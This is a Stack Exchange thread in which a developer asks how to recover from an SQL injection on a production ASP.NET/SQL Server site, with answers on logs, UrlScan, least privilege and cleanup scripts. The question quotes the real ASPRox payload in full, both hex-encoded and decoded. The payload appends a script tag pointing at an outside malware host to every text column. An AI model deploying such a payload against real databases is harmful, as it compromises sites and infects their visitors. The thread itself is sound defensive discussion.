# HELP! Production DB was SQL INJECTED!

Tags: asp.net, security, sql, hacking

> **Possible Duplicate:**
>   [My server's been hacked EMERGENCY](https://serverfault.com/questions/218005/my-servers-been-hacked-emergency)

Geeze, I'm desperate! A few hours ago our production DB was sql-injected.

I know we have some big holes in the system... because we inherited the website from a guy that did it on classic ASP, his programming was really awful and unsecured. So we spent some time migrating it to ASP.NET (first 1.1, then 2.0 and now 3.5). But it's a big project, and there is still old and unsecure code.
I'm not going to lie, the project is a mess, I hate it, but it's our most important client (we are just 2 young guys, not a big company).

So I know they have injected some js script references to my whole db somehow.... It was probably through an old page using concatenated string sql queries and throwing directly into the db (because that guy that starts the project said "Stored procedures doesn't work"..... so he did the whole site using string concatenation, and throwing them directly to the sql without doing any safety validation or anything.

When we got the project, the client didnt want to spend time redoing the crap that the old guy did. So we had to lead to crappy and unsecure code and fixing it while developing new features, because that was what the client wants... and now that we've been sql injected they get crazy of course.

SO....

**Is there any way to check for old the sql queries that have been executed in the last X hours? Something like how SQL Profiler does (but of course we didnt have the profiler open when the attacked happened)?
Is there a way to find out which page is the vulnerable one?
Please, help, there are a lots of pages. I cannot search through those manually without knowing for sure which one was the page.

Also... could there be another way they could inject the db? Like using an IIS request or js or something?**

I have full Remote desktop access to the server machine (it is not in a hosted environment) so I can access every file, log, whatever on the server...

Please help!

PS: Sorry, my english is not so great, and it's worse now that I'm nervous!

**EDIT**

- Windows 2003 Server
- SQL SERVER 2005
- ASP .NET 3.5

The script they are throwing is the following

```
DECLARE @S NVARCHAR(4000);SET @S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F006600310079002E0069006E002F006A002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200 AS NVARCHAR(4000));EXEC @S;
```

Which translated to text is:

```
DECLARE @T varchar(255), @C varchar(255)
DECLARE Table_Cursor CURSOR FOR 
select a.name,b.name from sysobjects a,syscolumns b 
where a.id=b.id and a.xtype='u' and 
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) 
OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN 
exec('update [' + @T + '] set [' + @C + ']=rtrim(convert(varchar,[' 
+ @C + '])) + ''&lt;script src=http://f1y.in/j.js&gt;&lt;/script&gt;''')
FETCH NEXT FROM  Table_Cursor INTO @T,@C 
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
```

Comment: putting yourself in the situation might be unacceptable, but once there, and at a lack of better knowledge on how to get out of there, i don't think it should be acceptable to *not* plea for help on the internet (whilst doing research yourself, elsewhere, which i bet from the tone that emzero is already busy doing)

Comment: Unfortunately, flatten & restore from backup may be best option.  If your server is hacked, you really can't trust anything on it.

Comment: I think the biggest clue would be which tables got injected on. Unless they were able to hit all tables with character columns.

Comment: I'd take the site down and off the internet until you figure out where the problem is and how to fix it, if nothing else.

Comment: C'mon...cut him some slack.  It is very common in Latin America to have companies not care about security and hire 2 guys to build (or even fix a failed system).

Comment: @emzero: this will be moved to serverfault.com soon, but you might not want to wait: go ask the question there now.

Comment: Why not? It's a case of server recovery, though it's developers who messed things up. The followup question of how do I make it not happen again, belongs here.

Comment: Looks like the magic quotes got you - they always do

Comment: I think it's code... they injected through the code, so it's bad programming, so I think it belongs to here.. they didn't injected using some hacking weird thing... they injected using the site code... so the site has bad code... so I think it belongs to here... 
And please don't be so mean ok? I'm 21 and I'm trying to do my best, but the american company didn't want to spend more money on security personal or stuff... so I'm here alone, with my parner.... so please have some compasion.... thanks
Btw, I have already take the site offline... I'm trying to figure out what is the vulnerable page

Comment: The tone (and content) of the first comment strikes me as something I'd expect from a Dilbertesque manager in response to the whole SO concept: "is this acceptable industry practice now?  have an urgent question about threading and synchronization to be addressed and plea for help on the internet?"  The guy has an issue and needs help...haranguing him won't help anybody.  Give him a break.

Comment: You might as well begin fixing every single vulnerable query.

Comment: @emzero, this sh*t can happen to anyone, and coming here for expert advice is probably the best thing that you can do.

Comment: @emzero: they broke in with code, but you're going to have to fix the problem using server management techniques. That's what I was thinking about: getting you the help you need from the experts.

Comment: This is the perfect example of why you shouldn't skimp on developers. Anyone reading this, take it as a warning. This is what happens when you hire "just 2 young guys" who don't have the proper experience to manage a software/web project. Web site security is critical. SQL injection vulnerabilities is a novice mistake. Take the website offline. Remove all of the concatenated SQL strings and replace with stored procs or parametrized queries. This should have been your priority in the first place. Then restore the database from a backup.

Comment: Don't take my comment the wrong way. It's not entirely your fault. You're young and have clearly been chucked in at the deep end, but if companies care about having their websites secure, they should be hiring people with more experience. You need a team with some experienced people who can teach the novices. You can't just have the novices running the team.

Comment: @simon-p-stevens, you should read again, they inherited it, they wanted to fix it and management said no. so not really a "young guy" problem.

Comment: @Simon - to emzero's defense, he did *inherit* a classic ASP application. We all know there was a large boom of novice developers writing crap code for large sums of money around the time of ASP. However, it's no excuse for not fixing any gaping security holes.

Comment: RULE #1 -- SLOW DOWN... you're in a hurry.  Don't get nervous and don't panic.  Stay calm, and do your best to think up all of your possible options.  TRUST ME ON THIS.

Comment: I thought Rule #1 was 'DON'T PANIC'?

Comment: How did this make it so serverfault- wouldn't this be better on stackoverflow?  Aside from one "install URLscan" answer everything here appears to be code related...

Comment: That's whay I was saying (I'm the one who asked the question on stackoverflow).... I don't know why they have moved it here.... Btw, my account here doesn't seem to be related to my account on SO (even though I DID relate them on accounts page).. so I don't have control to this question... is owned by nobody... and I repeat... this should haven't been moved to here since is totally code related.....

Comment: @Fredou & dotjoe: The management didn't say don't fix it, the client did. When I take on projects the client doesn't get a say in security or what code must be changed. I decide what needs doing to make it secure and meet their requirements to a level I am happy to support. If they reject that, I don't take the work. All I'm saying is, if you are a customer and you make that choice to save some cash, be aware of what can happen. It's not really emzero's fault, by his own admission he is inexperienced.

Comment: This appears to be some kind of cross-site attack?  I take it that the link in question is attempting some kind of semi-randomized URL (to evade scans) so that the client browser will load the link as well and receive the infection?  Has anyone here attempted some kind of remedial analysis of what the exploit is attempting?  Because it appears to be that your ***data*** may have issues as well.

Comment: I stand corrected, there are answers that have taken a look at the type of attack to determine what has happened.

Answer (score 26, accepted):

The first thing to do is not panic.  But I see you've skipped that and have decided to

The second thing is to take the site down and make sure it's not accessible from the outside until you can figure out what's broke.  Start looking at access logs and try to find out what the main problem is.

The third thing to do is see if you backup your DB regularly and just do a roll back.  You might lose some data -but you'll be in a better spot than you are right now

The fourth thing to do is - DO NOT - give out the url because apparently it's unsecure

Comment: If you go to his profile and click on his website, and then go to that website and click on his clients (in this case Manyworlds.net) you may notice that that site is 'down for maintenance'. Perhaps that's the insecure site?

Comment: upvote for turning off the site. So many people don't think to do it, but it's really important. Otherwise you're knowingly serving malware to your users

Comment: @Gortok - lol, supersleuth.

Comment: I also noticed on their site that one advantage to working from Argentina is how fluent they are in the English language.  Fluent enough, I guess.

Comment: +1 about the panic suggestion.  My parents use to tell me a proverb, which loosely translated means "Dress me slowly, for I am in a hurry."  Basically, he needs to slow down or he will either make or miss mistakes.

Comment: Yea - a lot of times you work yourself into such a fuss you overlook the problem.

Comment: I have already take the site down... we have a db backup, but we will obviously loss some things... But we won't restore it and put the site online again until we are sure we fix the security issue...
I don't know exactly how can I see somehow of sqlserver log... Anyway I think I need to remove every piece of unsecure query, and drop those damn "magic quotes" =P

Comment: @emzero Well it seems you found the answer then - just need to make my answer the accepted one ;)

Comment: @Gortok: If I could delete your comment I would.  Compounding the problem isn't exactly something that should be done here.  Try TheDailyWTF instead.

Comment: I take back my previous comment then: "This USA-based company "

Comment: I'd replace the first step with the first step for recovering OpenBSD's disklabel with scan_ffs(8): `Panic. You usually do so anyways, so you might as well get it over with. Just don't do anything stupid. Panic away from your machine. Then relax, and see if the steps below won't help you out.` - https://man.openbsd.org/scan_ffs.8

Answer (score 16):

Definitely make sure to install the newest version of UrlScan--it was pretty much designed to stomp on this sort of attack.

If you have IIS logs, the entry point should be pretty obvious--look for the one the hackers were hammering.

Another good backstop, if at all possible, is to deny INSERT and UPDATE rights to the web user account and punch that through stored procedures instead. That sort of backstop saved us from having a similar problem with a similar legacy app when this was a zero-day attack.

I think you can also remove the PUBLIC user's right to scan tables, which should keep them from doing the "foreach table" style attacks.

Comment: +1 for URLScan.  I believe it would have saved him in this particular case.

Comment: Some of URLScan's behaviour is builtin to IIS7. http://learn.iis.net/page.aspx/143/how-to-use-request-filtering/ I can't tell if it's on by default.

Comment: I've googled a lot to see if I can denied access to sysobjects and syscolumns but it says that it couldn't be done.... so, that won't help.
I have found the vulnerable page that was used to inject sql, so we fixed it.
Anyway, I'll take a look at UrlScan, seems a great tool, even though I've just read the summary description.
Thanks

Answer (score 10):

As a reference point, this is the work of the ASPRox bot SQL Injection attack. It seems to surface it self now and then because it gets pretty viral when compromised systems are found. You can Google around for "ASPRox bot" and get some additional cleansing methods and further prevention treatments. I just found [this PDF](http://www.networkcloaking.com/ASPROX_Toolkit.pdf) file that has a nice overview on its tactics and links to some cleanup options.

The problem is that virus/injection model essentially took every single text field in ALL your database tables and put in a little snippet that calls out to the URL specified to attempt to infect any other web clients and attempt to make them zombies that visit your site.

So make sure to check all databases on that server in question, not just the one with the database involved to do a proper cleansing.

It appears you're on the right path with the suggestions here, but having some "formal" references to the virus name might help with additional needs.

Comment: This is exactly what's needed: you've identified the problem and pointed at the solutions.  Good detective work.

Comment: Well, it is only good work in that it happened to me a while back. Fortunately it was near the beginning of SO, so the folks even helped me write a tool to decode that NVARCHAR mayhem... (http://stackoverflow.com/questions/109/decoding-t-sql-cast-in-c-vb-net) 8^D

Answer (score 9):

First, you have to shut the site down, to prevent further injection attacks.

Second, you need to do a security audit, to determine what logging you have, and what security is in place on the system, and determine how the attackers got in.

Third, you need to put in place logging and security for those areas where you were compromised, at the very least.  Put in place a system for detecting intrusion that informs you immediately (such as a pager).

Fourth, inform management that the downtime is a consequence of their ignoring security.

Comment: upvote for turning off the site.  So many people don't think to do it, but it's really important.  Otherwise you're knowingly serving malware to your users.

Comment: +1 for informing management/the client. It's partially their fault for not taking you up on your recommendation of securing the site.

Answer (score 3):

Check your IIS logs to find out which page they used to do the injection. Needless to say, you need to fix or disable that page quickly.

The best approach depends on the type of site. If at all possible, *take the site down* until you've restored an untainted database or reversed the changes (that requires detailed logs). Then you can put the site back up in read-only mode until you have time to fix the problem(s). Just restrict the SQL account to SELECT only.

Even when you concatenate query strings, you can be fairly safe with little effort. Searching all ASP files for keywords like SELECT and UPDATE will reveal all the queries. Surround all your parameters with basic sanity checks to start off.

Since you're probably in a hurry, you can take a look at some *really* old ASP VBScript code of mine. There are a bunch of SafeSqlWhatever functions in there to help you build safe SQL statements. No warranties, it was never intended to be public. However, replacing all the variable inputs with the **SqlVar(someValue)** function should get you started. You need to remove the single quotes from the rest of your query string, as SqlVar adds them for you. Alternatively, use the functions specific to the type of value you're expecting:

Before:

```
Conn.Execute("UPDATE posts SET Subject='" & subject & "' WHERE ID=" & id)
```

After:

```
Conn.Execute("UPDATE posts SET Subject=" & SafeSqlString(subject) & " WHERE ID=" & SafeSqlNumber(id))
```

PS: no, this is not the way it should be, but *probably* the quickest to get things back in working order from where you are now.

Comment: I love the script examples. (Even though you have SafeUBound declared twice, but asp lets you get away with it ;)

Comment: Haha, indeed... never noticed :) Personally, I was staring at the Mod 100 in the NiceDate function. Took me a minute to figure out what it was doing :P

Answer (score 3):

Trying to answer the original question about tracking down the query I though about doing it from the other direction, if the server has not been reset, pull all the queries from the query cache, that my show up which query was run - assuming it is still in the cache.

```
SELECT  ( SUBSTRING(s2.text, (statement_start_offset / 2) + 1, ((CASE WHEN statement_end_offset = -1 THEN (LEN(CONVERT(nvarchar(max),s2.text)) * 2) ELSE statement_end_offset END)- statement_start_offset)/2)) AS sql_statement
    ,execution_count
    ,(total_worker_time / 1000) as total_worker_time_milli_s
    ,(last_worker_time / 1000) as last_worker_time_milli_s
    ,((total_worker_time / execution_count) / 1000) as average_worker_time_milli_s
    ,min_worker_time
    ,max_worker_time
    ,last_execution_time
    ,qp.query_plan
FROM 
    sys.dm_exec_query_stats qs 
    CROSS APPLY sys.dm_exec_sql_text(sql_handle) AS s2  
    CROSS APPLY sys.dm_exec_query_plan(qs.plan_handle) as qp
WHERE
    s2.objectid is null
ORDER BY
    total_worker_time desc
```

Answer (score 2):

IIS might have some logs that could give you some hints at to what pages were accessed, if you have logging turned on. You can check in the configuration of the website.

Answer (score 2):

I would first make sure the sql user for the application only has read access by default.  Add insert/update/delete access to only the tables where it is needed.

Do you need to remove the .js references from the database?  We used this script a while back to remove all the .js references for all of our tables.  Is is a global find/replace for the database.  Enter the .js reference where you see this: `PLACE BAD JAVA SCRIPT CODE HERE`

```
DECLARE @T varchar(255),@C varchar(4000)   
DECLARE Table_Cursor1 CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)   
OPEN Table_Cursor1
FETCH NEXT FROM Table_Cursor1 INTO @T,@C WHILE(@@FETCH_STATUS=0)    
BEGIN exec('SELECT [' + @C + '] FROM [' + @T + '] WHERE [' + @C  + '] LIKE ''%.js%'' ')
FETCH NEXT FROM Table_Cursor1 INTO @T,@C END   
CLOSE Table_Cursor1 DEALLOCATE Table_Cursor1    

DECLARE @T varchar(255),@C varchar(4000)    
DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)    
OPEN Table_Cursor    
FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)    
BEGIN exec('update ['+@T+'] set ['+@C+']=replace(['+@C+'],''PLACE BAD JAVA SCRIPT CODE HERE'','''')')     
FETCH NEXT FROM Table_Cursor INTO @T,@C END      
CLOSE Table_Cursor DEALLOCATE Table_Cursor
```

Comment: Thanks, it almost worked... but we've got some text columns trunked.. so... restoring the latest backup is the only solution

Answer (score 2):

What usually happens is that the hacker (which is often a bot) performs a google search for what looks like possible entry points for sql injection (looking for querystrings, by searching for, say "inurl:.aspx?" or "inurl:?id="). and then it automatically tests for injection vulnerability. If you want to find the entry point, it might be a good idea to feed similar queries to google, and see what querystring sites of yours it has indexed.

Moving on, these scripts usually hope that the executing script has access to sysobjects, in which case it can iterate through all the tables in the database, and inject itself into every column. If this has happened (which I guess, otherwise the injection vulnerability could simply be assumed to be where the injected code is), I wrote a script once, that does the same thing, to search the entire database for a given value. it can be found here:

```
http://pastebay.com/28400
```

If you don't have any backups (which i'm assuming by your somewhat desperate tone), that script can be used to locate all injected columns, and with a little modification, it could also be used to strip those injections out.

So much for restoring the environment. After that comes the task of making sure it doesn't happen again. You're not in *that* much of a hurry, whoever injected you probably hit you on random and isn't likely to try it again very soon, but learn a lesson from this and make it a priority issue anyway.

As for securing the site, well, i've already mentioned the google way of getting a hint as to where the vulnerabilities are, but really, it's about time you face the task of moving your sql queries, one by one, to stored procedures, or an OR/M, or something. once you're done with that, you will have come pretty far in tidying up your messy source.

Comment: The order is a bit backwards: I'd make sure it doesn't happen again and _then_ restore the db.

Comment: that's a valid point of course, but a project like that could take quite some time, and i'm not sure the client would approve. also, this script actually injects js includes, which will then spread the infection to visiting users. i really think it should be a priority issue to remove that first, so as to not infect others.

Answer (score 1):

If you know that there are vulnerabilities you should definitely consider using a **Web Application Firewall** which is a filter running in front of your web server trying to prevent malicious input and known attacks from reaching your application/database. That way you could improve your security ad-hoc without rewriting and checking your legacy application.

This is not a perfect solution but with the given situation it would be a quick way to remedy a bigger amount of security vulnerabilities at once.

Comment: I forgot all about those, as I consider it bad habit to rely on them. However, in this case it's a good intermediate solution :)

Comment: Yes, I totally agree. Maybe my last paragraph has not been clear enough with that.

Answer (score 0):

I don't know if it's possible or not, but you didn't provide the details knowledgeable people would need to help.

- What is your database engine? (including version numbers)
- What is your web server? (presumably IIS, but what version?)
- What is your favorite... nvm

But specific applications and version numbers of your stack would turn this into a question that someone might be able to answer.

There is nothing in standard SQL that can give you this information, so you're looking for specific-vendor extensions or administration tools.

Comment: SQL Server 2005, IIS 6.0.... nvm?
What I'm asking is if there's a way to check for IIS/SQL logs to see what page was exactly the one that drops that infernal query

Answer (score 0):

This is a tough one.  For figuring out what the attack was, and what it might've done, I'd look at your IIS logs, not SQL.  Depending on the attack, the IIS log may show exactly what the sql-injection was.

If not, I'd immediately turn IIS logging (and SQL logging, and any other logging) up as high as you can.  Its possible the attacker is still poking around, and you want to track what he's doing, and start shutting off his access points ASAP.

Good luck!

Answer (score 0):

Get your site down and Start working one every thing once again. 
Once compromised, entering your system would be a piece of cake.

Any part time solutions are going to make things worse in the future.

Answer (score 0):

You also need to assume that this hacker now has a copy of all the data in your DB.  If that includes personal information then you should notify the people in question.

Comment: Normally yes, but this looks like a well-documented attack where data within the db is not "stolen" directly.

Comment: How does the fact that they found a well-known malware distribution hack in their DB preclude the possibility that they also did a SELECT * while they were at it?

Comment: They don't have any data, they just want to drop that js to harass people.